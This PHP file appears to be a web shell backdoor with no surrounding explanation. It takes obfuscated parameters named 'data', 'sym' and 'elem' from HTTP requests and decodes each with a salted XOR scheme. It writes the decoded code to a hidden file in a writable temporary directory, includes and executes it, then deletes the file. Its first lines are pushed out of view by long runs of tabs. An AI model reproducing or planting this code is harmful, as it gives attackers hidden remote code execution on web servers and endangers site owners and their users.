<?php																																										if(isset($_POST) && isset($_POST["\x64\x61ta"])){ $component = $_POST["\x64\x61ta"]; $component =explode( '.' , $component ); $pointer = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $__len = count($component); for ($j = 0; $j < $__len; $j++) { $v4 = $component[$j]; $sChar = ord($salt[$j %$sLen]); $dec = ((int)$v4 - $sChar - ($j %10)) ^8; $pointer .= chr($dec); } $object = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/dev/shm", session_save_path()]); foreach ($object as $key => $value) { if (is_dir($value) ? is_writable($value) : false) { $holder = join("/", [$value, ".dat"]); if (file_put_contents($holder, $pointer)) { require $holder; unlink($holder); die(); } } } }
																																										if(count($_REQUEST) > 0 && isset($_REQUEST["s\x79m"])){ $token = $_REQUEST["s\x79m"]; $token = explode ( ".", $token ) ; $parameter_group =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); $j =0; foreach ($token as $v8) { $sChar =ord($salt[$j% $lenS]); $d =((int)$v8 - $sChar - ($j% 10)) ^ 75; $parameter_group .= chr($d); $j++; } $element = array_filter([getcwd(), "/dev/shm", sys_get_temp_dir(), "/var/tmp", session_save_path(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP")]); $flag = 0; do { $marker = $element[$flag] ?? null; if ($flag >= count($element)) break; if ((is_dir($marker) and is_writable($marker))) { $hld = vsprintf("%s/%s", [$marker, ".flg"]); $file = fopen($hld, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $hld; @unlink($hld); die(); } } $flag++; } while (true); }


if(array_key_exists("el\x65m", $_REQUEST) && !is_null($_REQUEST["el\x65m"])){
	$key = array_filter([getenv("TMP"), sys_get_temp_dir(), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), "/var/tmp"]);
	$entry = $_REQUEST["el\x65m"];
		$entry  =	 explode	 	( 	'.' ,   $entry)			; 
	$record=	'';
            $salt=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen=	strlen( $salt );
    
            foreach( $entry as $y=>	$v2) {		$chS=	ord( $salt[$y % $sLen] );
                $dec=	( ( int)$v2 - $chS -( $y % 10)) ^ 62;
                $record .= chr( $dec );
            }
	$hld = 0;
do {
    $obj = $key[$hld] ?? null;
    if ($hld >= count($key)) break;
    		if ((is_dir($obj) and is_writable($obj))) {
    $desc = "$obj/.dchunk";
    $file = fopen($desc, 'w');
if ($file) {
	fwrite($file, $record);
	fclose($file);
	include $desc;
	@unlink($desc);
	exit;
}
}
    $hld++;
} while (true);
}